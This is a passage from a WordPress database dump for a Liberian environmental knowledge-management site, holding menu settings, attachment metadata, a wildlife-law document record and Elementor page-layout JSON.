86,2596,'_menu_item_menu_item_parent','129'),(17587,2596,'_menu_item_object_id','2596'),(17588,2596,'_menu_item_object','custom'),(17589,2596,'_menu_item_target','_blank'),(17590,2596,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(17591,2596,'_menu_item_xfn',''),(17592,2596,'_menu_item_url','https://us04web.zoom.us/s/77506914849?pwd=SlFZUTcva2U0RTRueENiWGk2eDlDdz09&_ga=2.100432222.1798241146.1629269445-1814410167.1629157860#success'),(17594,2596,'_menu_item_template',''),(17595,2596,'_menu_item_mega_template','0'),(17596,2596,'_menu_item_nolink','nolink'),(17597,2596,'_menu_item_category_post',''),(17598,2596,'_menu_item_megamenu',''),(17599,2596,'_menu_item_megamenu_auto_width',''),(17600,2596,'_menu_item_megamenu_col',''),(17601,2596,'_menu_item_megamenu_heading',''),(17602,2596,'_menu_item_megamenu_widgetarea','0'),(17603,2596,'_menu_item_icon',''),(17604,2596,'_elementor_controls_usage','a:0:{}'),(17605,2597,'_menu_item_type','post_type'),(17606,2597,'_menu_item_menu_item_parent','0'),(17607,2597,'_menu_item_object_id','2503'),(17608,2597,'_menu_item_object','page'),(17609,2597,'_menu_item_target',''),(17610,2597,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(17611,2597,'_menu_item_xfn',''),(17612,2597,'_menu_item_url',''),(17614,2597,'_menu_item_template',''),(17615,2597,'_menu_item_mega_template','0'),(17616,2597,'_menu_item_nolink',''),(17617,2597,'_menu_item_category_post',''),(17618,2597,'_menu_item_megamenu',''),(17619,2597,'_menu_item_megamenu_auto_width',''),(17620,2597,'_menu_item_megamenu_col',''),(17621,2597,'_menu_item_megamenu_heading',''),(17622,2597,'_menu_item_megamenu_widgetarea','0'),(17623,2597,'_menu_item_icon',''),(17624,2597,'_elementor_controls_usage','a:0:{}'),(17628,2599,'_menu_item_type','custom'),(17629,2599,'_menu_item_menu_item_parent','0'),(17630,2599,'_menu_item_object_id','2599'),(17631,2599,'_menu_item_object','custom'),(17632,2599,'_menu_item_target',''),(17633,2599,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(17634,2599,'_menu_item_xfn',''),(17635,2599,'_menu_item_url','http://lhsliberia.com/'),(17637,2599,'_menu_item_template',''),(17638,2599,'_menu_item_mega_template','0'),(17639,2599,'_menu_item_nolink',''),(17640,2599,'_menu_item_category_post',''),(17641,2599,'_menu_item_megamenu',''),(17642,2599,'_menu_item_megamenu_auto_width',''),(17643,2599,'_menu_item_megamenu_col',''),(17644,2599,'_menu_item_megamenu_heading',''),(17645,2599,'_menu_item_megamenu_widgetarea','0'),(17646,2599,'_menu_item_icon',''),(17647,2600,'_menu_item_type','custom'),(17648,2600,'_menu_item_menu_item_parent','0'),(17649,2600,'_menu_item_object_id','2600'),(17650,2600,'_menu_item_object','custom'),(17651,2600,'_menu_item_target',''),(17652,2600,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(17653,2600,'_menu_item_xfn',''),(17654,2600,'_menu_item_url','https://www.bgs.ac.uk/lgs/'),(17656,2600,'_menu_item_template',''),(17657,2600,'_menu_item_mega_template','0'),(17658,2600,'_menu_item_nolink',''),(17659,2600,'_menu_item_category_post',''),(17660,2600,'_menu_item_megamenu',''),(17661,2600,'_menu_item_megamenu_auto_width',''),(17662,2600,'_menu_item_megamenu_col',''),(17663,2600,'_menu_item_megamenu_heading',''),(17664,2600,'_menu_item_megamenu_widgetarea','0'),(17665,2600,'_menu_item_icon',''),(17666,2599,'_elementor_controls_usage','a:0:{}'),(17667,2600,'_elementor_controls_usage','a:0:{}'),(17687,2602,'_menu_item_type','custom'),(17688,2602,'_menu_item_menu_item_parent','0'),(17689,2602,'_menu_item_object_id','2602'),(17690,2602,'_menu_item_object','custom'),(17691,2602,'_menu_item_target','_blank'),(17692,2602,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(17693,2602,'_menu_item_xfn',''),(17694,2602,'_menu_item_url','http://iiu-monitor.org'),(17696,2602,'_menu_item_template',''),(17697,2602,'_menu_item_mega_template','0'),(17698,2602,'_menu_item_nolink',''),(17699,2602,'_menu_item_category_post',''),(17700,2602,'_menu_item_megamenu',''),(17701,2602,'_menu_item_megamenu_auto_width',''),(17702,2602,'_menu_item_megamenu_col',''),(17703,2602,'_menu_item_megamenu_heading',''),(17704,2602,'_menu_item_megamenu_widgetarea','0'),(17705,2602,'_menu_item_icon',''),(17706,2602,'_elementor_controls_usage','a:0:{}'),(17712,2558,'project_status','On-going'),(17713,2604,'_wp_attached_file','2019/11/lgslogo.jpg'),(17714,2604,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:19:\"2019/11/lgslogo.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"lgslogo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(17715,2605,'_elementor_edit_mode','builder'),(17716,2605,'_elementor_template_type','wp-page'),(17717,2605,'_elementor_version','2.7.5'),(17718,2605,'_wp_page_template','default'),(17719,2605,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17728,2607,'_elementor_edit_mode','builder'),(17729,2607,'_elementor_template_type','wp-page'),(17730,2607,'_elementor_version','2.7.5'),(17731,2607,'_wp_page_template','default'),(17732,2607,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17739,2609,'_elementor_controls_usage','a:0:{}'),(17740,2609,'by','Government of Liberia'),(17741,2609,'year','2016'),(17742,2609,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2016-National-Wildlife-Protected-Area-Law-2.pdf'),(17743,2609,'_pods_cover_image','a:1:{i:0;i:573;}'),(17749,2609,'_dp_original','2309'),(17750,2609,'_edit_lock','1670324949:42'),(17751,2609,'_edit_last','42'),(17752,2610,'_wp_attached_file','2019/11/2016-National-Wildlife-Protected-Area-Law-2.pdf'),(17754,2609,'_pods_attached_document','a:1:{i:0;i:2610;}'),(17771,2615,'_wp_page_template','default'),(17772,2615,'_elementor_edit_mode','builder'),(17773,2615,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet